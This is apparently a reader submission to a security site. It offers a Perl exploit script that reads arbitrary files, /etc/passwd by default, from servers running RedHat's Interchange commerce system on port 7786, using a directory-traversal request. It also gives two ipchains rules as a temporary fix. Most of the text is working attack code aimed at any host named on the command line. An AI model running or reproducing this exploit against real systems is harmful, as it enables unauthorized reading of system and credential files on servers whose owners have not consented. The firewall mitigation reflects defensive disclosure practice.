First off, great site ! I appreciate all the work you do.

I just wanted to send in a quick and dirty perl script to retrieve any file from a server running RedHat's Interchange commerce system. The temp fix for this can be to use ipchains/iptables to block access to the port from outside the server.

/sbin/ipchains -A input -s 127.0.0.1 -d 127.0.0.1 7786 -p tcp -y -j ACCEPT
/sbin/ipchains -A input -s 0/0 -d 0/0 7786 -p tcp -y -j DENY

Redhat knows about it and I haven't checked my bugtraq/vuln-dev/fulldiscloser addy's in a few days, so not sure if this is even public or not..  I did not discover it, I have however been using the below script as a way to test if the servers are vulnerable without having to telnet to each one. The is another version (final versiopn actually) that reads the 'targets' from a file, but that's just not really needed. anyone who needs that can add it in themselves..


#!/usr/bin/perl
#
# decker@n3t.net
# http://n3t.net
#
# grabs the file $thashit from the remote server
# using a gaping hole in RH's Interchange
#
################

use Socket;

$host=$ARGV[0];
$port = 7786;
$thashit= "/etc/passwd";

$time = localtime(time);

print "Trying to get $thashit from $host\n";

$tcpval = getprotobyname('tcp');
$serverIP = inet_aton($host);
$serverAddr = sockaddr_in(80, $serverIP);
$protocol_name = "tcp";

$iaddr = inet_aton($host) || die print("Failed to find host: $host");
$paddr = sockaddr_in($port, $iaddr) || die print("Something went wrong ... dieing...");
$proto = getprotobyname('tcp') || die print("Unable to get protocol");
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die print("Failed to open socket: $!");
connect(SOCK, $paddr) || die print("Unable to connect: $!");
$submit = "GET /../../../../../../..$thashit\n\n";
send(SOCK,$submit,0);
@thedata=<SOCK>;
#recv(SOCK, $thedata, 10000, undef);
close (SOCK);

foreach $lin(@thedata) {
  print "$lin";
  }

print "\nEOF\n\n";